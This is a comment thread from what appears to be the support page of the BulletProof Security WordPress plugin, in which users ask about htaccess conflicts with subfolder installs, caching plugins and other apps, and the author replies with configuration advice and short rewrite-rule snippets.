WordPress Installation Type: Root Folder Installation
WP Permalink Structure: /%postname%.html
My site has been operating fine with no plugins needing to be installed manually including BulletProof.
Is there a way to manually point BulletProof to the correct “root” location?
Am I hopelessly lost?
A side note maybe. If I manually set my RewriteBase and RewriteRule folder paths to include the sub folder as explained in “For Website Owners With WordPress Installations In Subfolders”
and then go click save under my permalinks, the manual edits are removed.
I must be missing something.
Thank you
David
Hi,
I couple of people have asked my about this already. I realize without a comment search feature it is a pain in the rear to try and sort through them. One of these days very soon I will add a comment search feature. The latest comment about this issue and my response can be found in the comments on June 4, 2011. My first question is why do you want to have WordPress in its own directory when you can migrate the site in less than 10 minutes by doing it in your host control panel? I ask this question every time when someone is doing this method. 😉 The other thing that i see that i think really doesn’t benefit your site in any way is using .html on the end of your permalinks structure. I remember seeing an old video about this in 2009. The video was put together by people hyping something and trying to pitch something. I experimented with it any way years ago and found it to be totally a waste of time if you did this because an “SEO expert” recommended or suggested this somewhere on the Internet then well you might want to double check that info. 😉 The other thing is you should always start your permalink structure with a numeric value for best performance. I created a post about the best permalink structures to use and why and with reference links to very credible sources. Now back to your issue. In a nutshell, I believe you are going to have to do some old fashioned manual FTP stuff if you want to use the “Giving WordPress Its Own Directory” method. If i remember correctly the problem is that BPS sees the folder that it thinks WordPress is in and not the actual folder where WordPress is when you use this method so you will have to do manual editing of the htaccess files and put them where you want them manually via FTP instead of using any of the automatic features in BPS. Thanks.
Why it’s own directory is easy. Just last week within 3 hours of installing a plugin, I had 4 “referral” clicks to the default location of where that plugin would have been installed if I had used the default install of WP. That plugin has been deleted and their IP’s blocked.
Thank you for the comments and directions.
David
Yep it’s super easy to do. I was using WP in it’s own directory many years ago and after running into so many problems with it I finally threw in the towel with trying to make it work for my purposes and just migrated the site. Now if you are just doing standard stuff with WP then you will probably be fine. I had several advanced and custom coding things set up and built into WordPress and they would fail intermittently for various reasons. Not sure what you mean by referral clicks. I guess you mean the plugin had 4 links going back to the plugin authors site or other sites? That’s a bit greedy. LOL FYI – Bots sniff out forms and code by searching for code itself so they will find the code no matter where you put it visually for humans. Unless of course you block the code / file with .htaccess or some other sniffiing deterrent or of course password protecting a directory. 99% of all hacking recon is done using Bots sniffing for code vulnerabilities. When a vulnerability is detected by a Bot then a human might sometimes step in and do some manual hacking work, but most of it is automated. The Bot program finds a vulnerability and automatically delivers its pre-coded payload without the human hacker who wrote the Bot program ever even looking at your website. FYI – blocking IP’s is less effective then blocking host names. IP addresses can be changed very easily or spoofed very easily, but a host name is a much more constant factor. Thanks.
Referral clicks meaning someone clicked a link to reach the file at /wp-content/plugins/wp… leaving off the last part. The “wp-content” folder does not exist on my site under that name or in the default location.
Same as if someone clicks a link in google or facebook as far as I know but that isn’t saying much. It was reported as a referral click which is how it shows if I post a link somewhere and it’s clicked on…
I understand it only keeps me off the radar for less intelligent attacks but so far I am happy with the results despite the extra work.
I am very new to all of this and learning and implementing as I go. No custom coding!
Thanks for the heads up on host names vs IP. More to figure out, yay!
Also will have to figure out what the heck to do for blocking code files too since my site went down yesterday. No clue what happened. So much to learn. YAY for backups!
Oh ok you mean the HTTP referrer, which is counted as a referral click. I got what you mean now. 😉 Yeah the real dangerous players work on a totally different level then surface HTTP methods. If a hacker is good he has created automated sniffer bots using python, nix or other coding languages that follow URL’s just like good bots and also work on a totally different level basically like a search and find approach instead of traversing URL’s. So for example if you have an app or plugin installed on your website that has a known vulnerability or exploit then these automated sniffers will find it without having to follow any URL’s. Gnarly eh? LOL Take a look at the Nikto Scanner software to get a basic idea of how other methods of search and find scanning is done by good guys and bad guys. Thanks.
Ed
Hi, I noticed that with the secure mode, if you have phpmyadmin under the root directory, certain pages from phpmyadmin wil not operate such as sql.php, tbl_create.php, any recomendations on removing a whole directory from the .htaccess file?
Is this the WP-phpmyadmin plugin? If so, see this post about it >>> Sucuri post on the WP-phpmyadmin plugin. If this is not the plugin you are using then please let me know which plugin it is. Thanks.
PS The Adminer WP plugin has been tested with BPS and a fix has already been created for this phpmyadmin plugin.
*** UPDATE ***
Adding an .htaccess skip rule to your root .htaccess file will correct this problem.
# phpMyAdmin folder skip rule for sql.php and tbl_create.php problems RewriteCond %{REQUEST_URI} ^/path/to/the/phpmyadmin/folder/ [NC] RewriteRule . - [S=30]hello all
bullet proof security give me suggestion permission 755 for my root folder ../
how to do It? any idea? very thanks
You can ignore that suggestion. I keep meaning to remove that from the file and folder permission checking. Thanks.
two great plugin bullet proof security and wp security scan has given to me suggestion to change permission to 755 root folder ( root directory ). I think this is good suggestion , and I must to change permission to 755. can you help me ? how to do it? many thanks
Hey AITpro, I’m having issues with 404s, from the admin page, and losing functionality in the wordpress backend, such things as unable to empty spam, change widgets, etc. I turned off BPS and everything started working fine again, wondering if you had any insight. Not really a code monkey so this stuff is kind of foreign to me. Thanks for your help again.
matthew
Check that the wp-admin BulletProof Mode is activated. The Root and wp-admin BulletProof Modes must be activated together. If you did activate the wp-admin BulletProof Mode, but there is a permission issue either with the /wp-admin folder or the /wp-admin .htaccess file then you will also get 404 errors. The folder permission for /wp-admin should be 755. The file permission for the /wp-admin .htaccess file should be 644. Also i see the you are using WPSC for caching so manually double check your root htaccess file to make sure everything looks ok if you are using WPSC mod_rewrite. BPS has built in checking for WPSC problems, but it can’t catch every possible problem with WPSC. Thanks.
Hey AITpro Admin, I’ve done everything you said above and I’m still having issues with 404’s from the admin page. Any more insight you could give, maybe a cache program that works better with BPS?
Thanks for your help.
matthew/mofx
You have a lot going on with the Theme you are using so maybe the 404’s are due to some custom structure that you have set up? I am unable to determine if your site is based on an existing Theme or if it is completely custom. Please email me directly edward[at]ait-pro[dot]com since this appears to be a non-standard or customized site specific issue. Take screenshots of the BPS Security Status page, System Info page, the WordPress Permalinks Settings page and screenshots of the actual 404 errors that you are getting. Download the .htaccess file that is in your site’s root folder and the .htaccess file in your wp-admin folder and send them to me. Also since your host is Dreamhost you have a lot more advanced options in regards to .htaccess files and other security measures. You may have some sort of conflict going on with either .htaccess files or possibly a custom php.ini file. Dreamhost offers the most advanced options to the end user of any web hosting i have ever seen, but with that advanced capability comes more time spent at the Dreamhost Wiki. 😉
My personal favorite caching plugin is W3 Total Cache and BPS and W3TC play very nice together. WPSC does not play so nice with BPS. Thanks.
Hi,
I use OpenX to serve ads on the site. After installing and activating the plugin all the ads stopped working.
Was wondering if there is a solution to this?
Thank you.
Tony.
Your site is what i consider a SPAM site. I got immediately blasted with SPAM ADS when i tried to view your website. Sorry, but i cant help you.
Are you talking about the pop up?
Thank you for noticing that!!
Our site has been getting attacks and we kept restoring from staging server. That plugin must have been activated on the staging and we forgot to turn it off.
This is why we installed the BulletProof Security
Sorry about that any case.
Well now when i try and look at your site a media player window launches right away. It appears that you have a lot of technical coding problems going on with your site right now and that is probably why your site is so easy to hack. When i look at your source code i see that OpenX is in your source code, but i cannot tell you if you have manually added this or this is a plugin. I will need to remove all of your links pointing back to your site in your comments due to the media player launching automatically. this is a method used by hackers to infect computers. It does not appear that it contained a payload, but I cannot allow a link like this to exist on my site. Let me know when you have the technical aspects of your site figured out and also i would need specific information on how you are implementing OpenX before i can offer any help. I will restore your site links once you have corrected the technical problems on your site.Thanks.
Admin,
Love the plugin, but have a question, I’m running a modified php.ini file for larger uploads, memory limit, post size, and script execution time. When I install you plugin and look at my system info all these settings have changed back to the normal php values. Does your plugin rewrite these somewhere? Do you know what’s happening? Thanks.
BPS uses new pre-made Master htaccess files so if you had existing htaccess files that had custom htaccess coding in them then by activating BulletProof Mode in your Root folder you would overwrite your existing Root htaccess file. If you made a backup first then you can restore that old htaccess file then use the BPS built-in File Editor and create a new Master htaccess file based on your old htaccess coding and combining it with the new secure.htaccess Master file. BPS does not alter or write to your php.ini files. BPS only works with htaccess files. With that said Dreamhost allows you to use “flags” in your htaccess file to control your php.ini directives via htaccess.
You’re probably already aware of this – your web host, DreamHost, offers the most user control and advanced htaccess options of all the web hosts that i have ever seen. Meaning that you can do a lot more things with htaccess on DreamHost hosting. This also means that things are a little more advanced and complex. DreamHost has their own Wiki that has excellent and precise instructions on everything that you can do on their hosting servers.
So most likely what happened is you had custom htaccess code in your root htaccess file that contained flag directives that controlled your php.ini settings for this particular domain. At least this is a logical guess anyway. 😉 It really all depends on where you made the original changes. And just adding those changes back or doing something new with the BPS htaccess files. Take a look at the DreamHost Wiki for all the options available to you – and there are many, many different options. Thanks.
Oh and one last general thing about htaccess files. The are hierarchal meaning that if a parent folder has an htaccess file and a child or subfolder of that parent does not have an htaccess file than the parent htaccess directives will be applied to that child folder. If the parent folder has an htaccess file and the child folder has an htaccess file than the htaccess directives in the child folder apply to only the child folder and the parent htaccess file directives will be ignored in the child folder.
Awesome, worked like a charm thanks for the help and great plugin.
I am currently using idev affiliate. It has mod Rewrite code that goes in the .htaccess file above the following code:
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
I want to use BPS Security plugin. Is it ok to just add the idev affiliate rewrite code into the secure.htaccess file? Here is what Idev says: “This code must be placed at the very top of your .htaccess file, before everything else in the file.”
Also, i have a subdomain on my server. the folder has a script in it and is located in the root domain as is my wordpress site. I have the subdomain pointing to that folder. The following code is in my .htaccess to redirect if someone happens upon the folder:
# END WordPress
RewriteCond %{HTTP_HOST} ^freeclassifiedproducts.com$ [OR]
RewriteCond %{HTTP_HOST} ^www.freeclassifiedproducts.com$
RewriteRule ^members\/?(.*)$ “http\:\/\/members\.freeclassifiedproducts\.com$1” [R=301,L]
How and where do I put this code in the secure.htaccess file?
Thanks a bunch.
Daniel
Yep I assume it is ok to add idev htaccess code above the WordPress mod_rewrite if that is what the plugin author is instructing you to do. I assume that htaccess code will have REQUEST_URI rules in it or SSL / HTTPS rewriting rules. You will know right away if that is not going to work because when you click on any category links you will get 404 errors or other HTTP errors. The BPS Exploit filters work in a way that where they are located in the order of your root htaccess file is not important. Since the Exploit filters are based on conditions this means that when any condition specified in the Exploit filters is met that is not allowed someone is automatically sent to your Forbidden page.
Yep i see that your subfolder / subdomain rewrite is currently working correctly on your site to rewrite the /members folder to this subdomain URL members.blah.blah. Since this is a conditional rule the order of where it goes in your root htaccess file is not important. When that condition is met that rule will automatically work. Personally I would put it right after your # END WordPress mod_rewrite code just like you are showing in your comment. Thanks.
My question is actually is it ok to put the idev code above the line:
# BULLETPROOF .46.3 >>>>>>> SECURE .HTACCESS
Will that affect the plugin at all other than an error message?
Would it be better to put the iDev code between lines 1 and 3 of your secure.htaccess file (see below):
# BULLETPROOF .46.3 >>>>>>> SECURE .HTACCESS
(iDev Code goes here)
# If you edit the line of code above you will see error messages on the BPS status page
Thanks,
Daniel
Oh you meant literally the top of the htaccess file. Well if you place code above the commented out line # BULLETPROOF .46.3 >>>>>>> SECURE .HTACCESS then yes this will cause BPS not to display the correct status information on the BPS Status page. So yes you will get error messages, but BPS will function correctly. Since that is a commented out line in the htaccess file it does not count for anything other than BPS checking the version number. So you should just add your htaccess code below this commented out line. It will be seen as the first line of “active” htaccess code in the htaccess file. Thanks.
So I installed the root .htaccess code. Everything seemed to work find but the code stopped me from deleting a user. I run a membership site. Is this a common problem? Any suggestions?
Regards,
Daniel
Sounds like you did not activate the wp-admin BulletProof Mode. The Root and wp-admin BulletProof Modes must be activated / used together. Thanks.
Since installing BulletProof Security on my WordPress 3.1.3 site hosted by DreamHost, my website stats are no longer available at http://www.nameofsite.com/stats/. Renaming .htaccess gets the stats working again. Is there a change I can make that will allow the stats report to run while keeping BulletProof Security installed? Thanks!
To view your stats with DreamHost you will need to add this htaccess code to your root htaccess file. The # BEGIN WordPress to END WordPress htaccess code already exists in your root htaccess file so you are just adding the new IfModule code below (it goes above your existing WordPress htaccess code exactly as shown below). Your RewriteBase for the new stats htaccess code that you are adding should be the same as your WordPress RewriteBase. Thanks.
RewriteEngine On RewriteBase / RewriteCond %{REQUEST_URI} ^/(stats|failed_auth\.html).*$ [NC] RewriteRule . - [L] # BEGIN WordPress RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPressThat worked perfectly. Thank you so much for this prompt solution!
Dear AITPro,
I’ve been using Bulletproof Security for a while now, and I’m very pleased. There’s just one problem I’d like some advice on. So long as the root .htaccess is active, I cannot install another WordPress in a sub-directory. Disabling it and then installing helps, but when I enable it again, some functionality is lost (eg. I am denied access to some pages, which means I can’t delete plugins, for example). I’ve seen this link in the FAQ: http://www.ait-pro.com/aitpro-blog/1166/bulletproof-security-plugin-support/bulletproof-security-plugin-guide-bps-version-45/#modifying-htaccess-files
But it is unclear to me as to how this would help me. Is there a way for me to add an exception to the root .htaccess, or something, so that I can fully use my second (actually third) WordPress installation?
Thanks in advance,
Veliremus
Each site should have it’s own installation of BPS and that means that each site would have it’s own htaccess files in the folders for each site. I took a look at your site and it does not appear that you have an MU or a Network site. BPS would not block installation of an additional WordPress site so I am not sure what this means – “I cannot install another WordPress in a sub-directory”. The other issue with being blocked from deleting plugins and other administrator functions being blocked means that the wp-admin BulletProof Mode is not activated. Both the Root and wp-admin BulletProof Modes must be activated together for everything to work correctly. The old manual instructions are confusing and will eventually be removed or rewritten so disregard them. Please explain in detail what you mean by installing additional WordPress installations. Thanks.
Thanks for your reply.
Okay, here’s the deal. I have, at the moment, three WordPress installations. One is my root, one is my blog (/presstoplay/) and one is a new site I’m working on, which is currently housed in a sub-directory. My root and my blog are protected by Bulletproof. This new site isn’t yet.
What happened was: I made a sub-directory to the root (veliremus.com/newfolder/) and uploaded all the WordPress files there. But when I tried to install, I got a “Permission denied” even though all permissions were set correctly. I then found out that the .htaccess made by Bulletproof in the root was the source of the problem. As soon as I disabled that by temporarily renaming it, I could install WordPress.
After the install, I enabled the .htaccess again. This caused some problems with permissions again, like me not having permission to view a certain php file, and when I tried to delete plugins, the same came up, in stead of an “are you sure?” prompt. You get links like this, it can’t access: wp-admin/profile.php?updated=true (this happens when I update my profile. I can get to the page, but as soon as I click Submit, I get a Forbidden).
Now, I have just Bulletproof on my new WordPress installation, and this solves the problems, I seems. But I’d just like to know, if anything like this happens again, I can just temporarily disable the .htaccess, right?
*** This only applies to someone who is doing a manual installation of WordPress in a new subfolder / site under a parent folder / site that has BPS installed ***
Ok I understand now. Either the “Permission Denied” error message was the WordPress default / general / all purpose error message when trying to access an admin area or the permission denied was either your host’s 403 Forbidden page or a custom 403 Forbidden page that you set up in BPS. When doing a manual installation of WordPress you would need direct browser access to /readme.html and /wp-admin/install.php. The FilesMatch section of the root htaccess file blocks direct browser access to the /wp-admin/install.php file and the /readme.html files unless you uncomment the Allow from line and add your current IP address or temporarily remove those files from the FilesMatch section of htaccess code or comment out the whole FilesMatch section of htaccess code or the simplest solution of all – just temporarily put your root site in Default Mode to perform a subfolder installation. Now with htaccess files in general they are heirarchal meaning that if a parent folder has an htaccess file and a child folder does not have an htaccess file then the parent’s htaccess file rules will be applied to a child folder or any and all subfolders under the parent folder. So another approach could also be to upload the default.htaccess file to your new subfolder and rename it to just .htaccess. BUT BE SURE TO MANUALLY ADD THE CORRECT REWRITERULE AND REWRITEBASE TO THE HTACCESS FILE FIRST. So you would be adding this first RewriteBase /newfolder and RewriteRule /newfolder/index.php. For exact and detailed instructions on manually editing htaccess files see the BPS Guide. Ok so the main idea is that each website should have its own htaccess files – 1 in the root and 1 in the /wp-admin folder. When you have a subfolder under a parent folder that has an htaccess file in it and the subfolder does not have an htaccess file it it then the subfolder is following the rules in that parent htaccess file. So obviously this would not work for the subfolder site because URL rewriting would be rewriting to the parent folder and not the subfolder. ie the index.php file under your new subfolder would be trying to rewrite to your root domain = not going to work right. 😉 Thanks.
Sorry, forgot to leave a comment. It worked. I had the same problem with installing phpBB today, so I copy-pasted the default.htaccess, modified it, and then added phpBB’s addition. That works :). Thanks for the assistance!
Hello, AITpro.
My website has been up for a few months. Soon after publishing, I had GoDaddy site scanner installed. Last month, it ran a scan and revealed that the site was susceptible to xss (and every relative attack, I’m sure). Since this revelation, I’ve been somewhat paranoid of every blank field, drop down menu and URL I’d see… I disabled my search bar (text field), removed every contact or form related plugin (indefinitely) and I’ve been on a quest to protect the site ever since. Then, I read about your plugin on WP.org… which led me here.
I’ve read about people using Super Cache and various other plugins seeking your acumen re: compatibility issues, error messages and the like. But, admittedly, I’m very new to website security and my site has simple plugins and widget functionality now. I’m simply hoping to enable my search field again and two forms on my site w/o worrying endlessly about hacking attacks. I’m not versed in the true functionality of or need for Super Cache and other plugins I read about in your plugins threads, but as it stands, that’s all I’m looking for is something that will protect my site, entry fields and URLs from being manipulated or changed (aka hacked).
In looking at my htaccess file — though I don’t understand it line-for-line, it seems pretty short and sweet. I did back-it-up via FTP and I’m ready for BPS. That said, is there anything you think I (someone new to website security and simply seeks the protection described) should know or be made aware of before downloading and/or installing BPS? And, will installing BPS not only protect my search field from attack, but also any contact form I use on my site? Please let me know if you would need a link to my site to better answer the questions posed.
Side note: I was using CCF (custom contact forms), but removed it after the scan resulted in text field vulnerability. I’d like to reinstall that one (if you recommend it) or use another form with customizable options in the very near future.
In closing, I’ve been reading about BPS on here, WP and at least one other site, and I have to say that you are the most thorough, accessible and informed author’s I’ve ever seen! That effort needs to be commended and compensated. Something I surely intend to do.
-Bill
Hello Bill,
Welcome to the wonderful world of website security awareness. LOL It sucks that we have to be preprepared against the worst, but I guess pretty much everything in life is like that. 😉 Better to be prepared than be surprised by an experience you don’t want to have – your website being hacked.
The Query String Exploits Filters are designed to block the code that would be used in a website hacking attempt. So basically what happens is if someone is trying to run a script against your website to hack it and that script contains any of the code that is blocked in the Query String Exploits filter then the hackers script fails against your website. Very simple and very effective. 😉
It is possible and even likely that even after installing BPS you will still get a warning about the CCF form, but BPS will block the hacking scripts that would be used in hacking attempts made by entering those scripts into the form text field. What BPS cannot block against in regards to forms is if the form action itself does something that is considered dangerous like file uploading. Since CCF is just a contact form then there really is not that much that can be exploited and the same applies to your search window. In the past one of the most common exploits done on a search text field was an SQL Injection exploit. WP blocks against this already and with BPS in place any code that is blocked in the Query String Exploit filters will not be allowed and the script will just die or if you have a 403 Forbidden page set up then the person running the script (usually an automated Bot) will be sent to your 403 page. I’m sure if I ran a scan on my site’s search window it would also tell me that it could be exploited, but BPS will filter out any code that is not allowed so there is nothing to worry about.
Thanks for the Mega Kudos!!!
Best Regards,
Ed
Thank you very much for your detailed response.
Last question before downloading BPS: GD site scanner support gave me a test code to enter into the search field to test for vulnerability. I won’t enter here, but it was a script that, once entered into the search field, would simply execute a pop-up “alert.”
That said, upon installing/running BPS and re-enabling my search field, would that code still work because its just a test script and not an actual hacking attempt?
To be able to tell you what the test script’s realistic capabilities are or the accuracy in a real life hack situation I would need to see the test script. You can email it to me via my contact form if you want and I’ll let you know that info. Thanks
Hi, Ed.
And, Thank You for the allotted time.
Please note that I recently submitted the test code via your contact form. Feel free to post your findings here rather than emailing me back.
Thanks again,
-Bill
Hello,
Been using BPS for a couple months, no issues.
One question;
Are there any known issues with Adsense?
I have a site with Adsnese, all is well, updated BPS this morning and now I’m missing one ad in one location. The placeholder exists…it’s just blank. All other ad locations function normally.
I know correlation doesn’t prove causation, and I’m not saying this has anything to do with BPS, just thought I’d ask (the ad stop displaying correctly right after the upgrade to latest BPS this morning. Who ever knows what freaks out the big “G”).
Thanks for the help.
Cheers!
Mike
I am not aware of any issues with BPS and Adsense. I looked at your site and see an iframe that is not loading the page successfully. It is under your adsense section of coding so this appears to be the one you are referring too. When i check the link that this ad goes to i get an authentication failed! error message. Is the link valid? Check to make sure that this particular ad is valid. Other than that i don’t see any strings in the link that BPS would be blocking. It just appears that that particular ad has a problem or has an invalid link. I checked some of your other iframes ie your Google maps and they are loading fine so BPS is not blocking iframes in general so once again check to make sure the link is valid for that particular iframe ad. Thanks.
*** Update ***
the ad’s URL link contains #038; – this might be automatically inserted by WordPress or maybe the people you are getting the ad from meant to use & amp;. Either way this is the problem with the URL link. At least this is the most obvious thing that does not seem correct.
Thanks for the help. That iframe at the bottom is an airport departure widget. what I was referring to is the 160×600 Skyscraper in the upper right corner.
Anyway, I’ll keep poking around. I’m beginning to think that the geo targeting is keeping g from showing ads to me because I live in the United States, not Ireland.
Thanks for the help.
Wow i just looked again something is really odd. the iframe tag for that ad does not exist in your source code. I thought i was looking at the right ad, but there is not another iframe tag in your source code. Could the problem be that the iframe tag is missing because it has not been added correctly for that Ad?
Thanks.
I upgraded to .46.3 this morning, and when I updated the root .htaccess and copied over the W3 Total Cache elements, the server promptly 500ed on all requests. Restoring the .46.2 resolved the error. I did comment out the Options -Indexes line, but that didn’t fix the problem.
I can send you the relevant files if you’d like to see them. In the meantime, I’m running with the .46.2 root .htaccess file. Should I be concerned by this configuration?
There are no significant htaccess coding differences in the htaccess coding from .46.2 to .46.3 besides the Options -Indexes directive being brought back so try the upgrade again and use the AutoMagic buttons to create your master htaccess files, then activate all of the BulletProof Modes. Most likely what happened is that the copy and paste contained some some whitespace in the paste where it should not have been. I have done this myself so I know it is one reason that you will get a 500 error. This was one of the reasons i added the new W3TC and WPSC HUD checking thing. BPS will now tell you that you need to redeploy W3TC and provide a link in the Heads Up Display HUD message so just activate all BulletProof Modes and then click the W3TC Redeploy link in the HUD message that pops up after you have activated all BulletProof Modes. In other words, you no longer have to manually copy and paste the W3TC htaccess code to your root htaccess file anymore. 😉 A similar HUD message also pops up for those people who are using WP Super Cache with a link to the WPSC mod_rewrite settings page. Thanks.
Also just as an FYI to anyone who sees a 500 error when they are in Maintenance Mode – when you are in Maintenance Mode you DO NOT want to be adding any new htaccess code to your root htaccess file. If you redeploy W3TC while you are in Maintenance Mode then you will see a 500 error. It is fine to update W3TC but you do not want to do anything that will write any htaccess code to the .htaccess file in your root folder while you are in Maintenance Mode.
I installed WP 3.1.3 in a subdirectory and followed the instructions in the article Giving WordPress It’s Own Directory While Leaving Your Blog In the Root Directory.
Per those instructions, .htaccess and index.php were moved from the subdirectory to the root. Will BP work with such a setup?
When I installed and activated BP, in the Status tab, I saw 2 errors:
Yes you can make this work, but i do not recommend doing this. You will run into all kinds of problems, not only with BPS, but with many other things. I recommend migrating your site instead. This is a very simple thing to do that should only take you about 10 minutes. Use your host control panel and copy your entire WordPress site (all files) to the new folder location. This is the fastest way to do the move. Then follow the WordPress Codex Migration / Moving instructions here >>> Moving_WordPress
The php errors you are seeing is a PHP5 error so that is a good thing. What these errors are telling you is that you currently do not have htaccess files in either your root or wp-admin folders. You need to have a custom permalink structure if you are using BPS and you should have one anyway. When you create a custom permalink structure for the first time this will create an htaccess file in your root folder. The first php error could also be one of the first of many problems you will experience if you do the “giving wordpress its own directory…” method. 😉 Thanks.
I don’t quite understand.
You recommend that I migrate my site to a new folder location but it is already is sitting in its own subdirectory. Both would be 1 level below the root so I don’t see what difference it makes, whether it’s in one subdirectory or another.
If the purpose is to undo the “leaving your blog in the root” part, I can do that using the same subdirectory by undoing the steps I did previously.
Also, you said I need a custom permalink structure. I already did that. It is “/%year%/%postname%/”.
Checking the files on my site:
– the root has .htaccess and index.php, a result of following the “Giving WordPress It’s Own Directory While Leaving Your Blog In the Root Directory” article.
– the subdirectory has all the other WP files. There is no .htaccess in that subdirectory.
– the wp-admin directory has no .htaccess file
The reason I employed the technique described in the WP Codex was for 1) a tidy root by keeping the WP files in a subdirectory and 2) a clean URL that hides the fact that the WP files reside in a subdirectory.
Ok i reread your question and i think i understand what you are trying to do. I was not suggesting that you migrate WordPress to a new folder. I thought you were trying to do something else. The WordPress documentation tells you to update your permalinks again so that a new htaccess file will be created with the correct RewriteBase and RewriteRule so you will just need to copy and paste whatever that WordPress generated htaccess code is to the BPS Master Root htaccess file – the secure.htaccess file. You will be replacing the section of htaccess code in the BPS Master Root htaccess file – the secure.htaccess file that starts with # Begin WordPress and ends with # End WordPress and then you can activate BulletProof Mode for your Root folder. This will overwrite the WordPress htaccess file with the BPS secure.htaccess file.
Ok well maybe the php error was being caused by something else then. Usually that php error means the file does not exist where the file_get_contents function was told to look.
Now after saying all that I can’t think of even one good reason to go through all the extra hassle. If WordPress is already installed in a subfolder then just keep everything where it is and don’t bother moving the index.php and htaccess file to the root. Maybe this has something to do with having a URL that does not show the folder name in the URL path? You can do the same thing with htaccess without having to risk URL’s not rewriting correctly, but like i said you really don’t need to do that any way. Thanks.
Hi,
I was wondering about this code :
# Allow from line of code and remove the # sign in front of Allow from to uncomment it
Deny from all
# Allow from 88.55.66.200
I want to make sure that if I do put in my IP address in there… and for somer eason my IP would change, would I still be able to log into my wp dashboard to go and edit this ip in the plugin, so it changes the htaccess files ?
Or maybe its not gonna work, because I log in the blog with a different ip that the one listed in the htaccess file by your plugin.. ?
I am not sure im expressing my questions correctly for you to understand.. sorry.
My concern is that if my ip changes and its set to only the previous one, am I going to be scrwed and cant access my blog anymore ?
Thank you
The Allow from IP address is only used for allowing you to access the files listed in the FilesMatch section of htaccess code from your Browser. It does not affect anything else except for the files listed in the FilesMatch section of htaccess code. You could still access those files via FTP. This is just designed to stop someone from being able to open those files from a Browser window. As a test try and open the WordPress readme.html file from your browser and you will not be able to open it. The WordPress readme.html file is located in the root of your site so go to your home page and then type in /readme.html to try and open the file. Now add your IP address and uncomment the Allow from line of code and you will now be able to open that file from your Browser. Thanks.
I installed your plugin, but due to restrictions by my webhost I cant use it effectively, so I uninstalled it, but now lots of things on my wordpress don’t work, like adding, removing or editing widgets. How do I properly remove BPS?
Ok the 2 main things that BPS adds to your website that you will need to remove are: The root .htaccess file and the /wp-admin .htaccess file. Did you already have a root .htaccess file before installing BPS? Did you back that file up? Did you restore that .htaccess file if you had one before uninstalling BPS? Did you enable or create a custom permalink structure? If so, and whether or not you did do this, save your custom permalink structure again to create a new generic WordPress .htaccess file. Now either FTP to your website or use your web host Control Panel and delete the .htaccess file that is in your /wp-admin folder. Thanks.
Hey guys. I had a question about the BPS plugin. I have this nasty little hack on my site that is altering the htaccess file in wordpress and redirecting all of my google searches to specific spam sites. Will BPS fix that?
Thanks!
Yep BPS has built in self protection for itself so that the BPS htaccess files themselves cannot be opened or altered by anyone other than you. This is assuming of course that the hack was done remotely and not done by someone who has hacked your FTP password. BPS will block the initial hacking method that was used to alter your htaccess file and BPS also self protects itself so that the BPS htaccess files cannot be altered. Thanks.
I installed BulletProof Security on my blog a few days ago and immediately lost the ability to click to view posts. I have since deactivated the software and uninstalled it, but no luck. Can you help?
I assume you are talking about the posts link at the top of your site that is a link to your feedburner? I don’t think BPS would have anything to do with this problem. The link is invalid. feeds.feedburner.com/feeds.feedburner.com/perth-families When i removed the duplicated first part of the feedburner link it works correctly. Thanks.
I have WP with BPS installed in my root folder with PhpGedview genealogy suite installed in a subdirectory. I also have a new version of Webtrees installed which uses a lot of the code from PGV so has a similar issue. There is one function (Pedigree Chart) that causes an “Page Not Found” error with both PGV and Webtrees and I have to use a .htaccess in the home directory of both PGV and Webtrees, containing “RewriteEngine Off” otherwise it will not draw Pedigree Charts.
The format of the URL causing the error is:
http://www.my_site.org.uk/webtrees/pedigree.php?ged=Gedcom2.ged&show_full=1&talloffset=1
Can you suggest any other work-around or maybe incorporate a permanent fix into BPS? I am also in touch with the developers of Webtrees so they could rewrite some of the code if necessary as Webtrees is very much “work in progress” at the moment.
Cheers,
Stuart
Yep the RewriteEngine Off htaccess method is an acceptable method to prevent the htaccess rules from the BPS htaccess files from being applied to other folders, but i believe that you will need URL rewriting for that or those particular folders. So what you should use is the default.htaccess file that comes with BPS and copy it to the folder or folders and rename it to just .htaccess. If there is still another or additional issue then I believe the section of the string in the URL that you would want to create a skip rule from would be >>> show_full=1&talloffset= So you could try adding this to your root htaccess file, but i think the real problem is that you do not have URL rewriting occurring for the /webtrees folder anymore since you have an .htaccess file with RewriteEngine Off for that folder.
# PhpGedview genealogy suite – Possible string skip Fix
RewriteCond %{QUERY_STRING} show_full=1&talloffset=(.*) [NC]
RewriteRule . – [S=30]
Hi there,
Thanks for your comments and suggestions. Adding the default.htaccess to the relevant directories fixes the issues as far as I can tell. Adding your work-around to the root htaccess made no difference to the problem and I still had a “page not found” error.
Putting in the default htaccess is no problem so as it works I’ll go with that solution.
Thanks for your help,
Stuart
I installed this plugin last week and ever since I have experienced page loading times that are VERY long. Pages used to load in seconds now it lterally takes minutes. It was really bad a t first, then got better, but now is bad again. I also run WP Super Cache, thought maybe that was the problem, but I disabled it and it did not help… Is this a known issue. All seems installed correctly, status is all green and says its working.
Maybe I just shouldnt use it… Problem is I dont know how to restore the htaccess files to what they were before installing, so disabling wont do a thing for me, right?
Yep there is a known problem with the latest version of Super Cache when using the mod_rewrite option to serve cache file and BPS. Re-enable Super Cache and then you will need to go to the BPS built-in file editor and manually cut and paste the htaccess code that Super Cache is adding to the bottom of the root htaccess (instead of to the top of the root htaccess file) file paste it to the top of the root htaccess file. There is a coding bug in Super Cache that is doing this and the Super Cache plugin author has been notified. I will be adding an alerting message in the next release of BPS. Please see this WP forum post >>> WP Super Cache WordPress Forum Post Thank you.
I checked your site and noticed some problems. Your custom permalink structure has /index.php/postname. At least I think that it is postname, but that may be a category tag? Typically you would only include /index.php if you had IIS web hosting. Your site appears to using Apache Linux hosting so you would not want to be using /index.php in your permalink structure.
Please see this post I created about the best custom permalinks to use for performance reasons >>> http://www.ait-pro.com/aitpro-blog/2304/wordpress-tips-tricks-fixes/permalinks-wordpress-custom-permalinks-wordpress-best-wordpress-permalinks-structure/
